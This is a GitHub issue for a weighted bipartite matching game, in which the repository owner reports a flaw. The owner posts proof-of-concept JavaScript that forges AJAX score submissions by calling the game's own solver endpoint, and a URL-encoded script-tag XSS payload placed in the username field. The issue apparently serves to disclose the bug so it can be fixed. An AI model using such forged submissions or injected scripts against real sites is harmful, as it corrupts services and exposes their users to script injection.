search

yulonglong / BipartiteMatchingGame

(Completed). Weighted bipartite matching game web application.
http://game.yulonglong.com
0 stars 0 forks source link

Fix bug of user able to modify AJAX call to submit score (and XSS) #9

Open yulonglong opened 8 years ago

yulonglong commented 8 years ago 
function solveFast() {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var xmlhttp2 = new XMLHttpRequest();
            xmlhttp2.open("GET","matching.php?cmd=submit&graph_id=1&solution=[[0,1],[1,0]]&username=iampro");
            xmlhttp2.send();
        }
    };
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id=1",true);
    xmlhttp.send();

}
yulonglong commented 8 years ago

kester_game.txt

yulonglong commented 8 years ago 
var LAST_GRAPH = 9;
var USERNAME = "iampro";

function solveFast(id, soln) {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var xmlhttp2 = new XMLHttpRequest();
            xmlhttp2.onreadystatechange = function() {
                if (xmlhttp2.readyState == 4 && xmlhttp2.status == 200) {
                    var response = xmlhttp2.responseText;
                    console.log(id + ": " + response);
                    if (id < LAST_GRAPH) {
                        getSolutionAndSolve(id+1);
                    }
                }
            };
            xmlhttp2.open("GET","matching.php?cmd=submit&graph_id="+id+"&solution="+soln+"&username="+USERNAME);
            xmlhttp2.send();
        }
    };
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id="+id,true);
    xmlhttp.send();

}

function getSolutionAndSolve(id) {
    var solution;
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var graphJson = xmlhttp.responseText;
            var xmlhttp2 = new XMLHttpRequest();

            xmlhttp2.onreadystatechange = function() {
                if (xmlhttp2.readyState == 4 && xmlhttp2.status == 200) {
                    var solvedGraphJson = xmlhttp2.responseText;
                    var solvedGraphArray = JSON.parse(solvedGraphJson);
                    solution = JSON.stringify(solvedGraphArray["match"]);
                    solveFast(id, solution);
                }
            };
            xmlhttp2.open("GET","matching.php?cmd=solve&graph="+graphJson,true);
            xmlhttp2.send();
        }
    };
    xmlhttp.open("GET","matching.php?cmd=generate&graph_id="+id,true);
    xmlhttp.send();
}

getSolutionAndSolve(1);
yulonglong commented 8 years ago

var USERNAME = "%3Cscript%3Ealert%2812345%29%3B%3C%2Fscript%3E";

XSS is also possible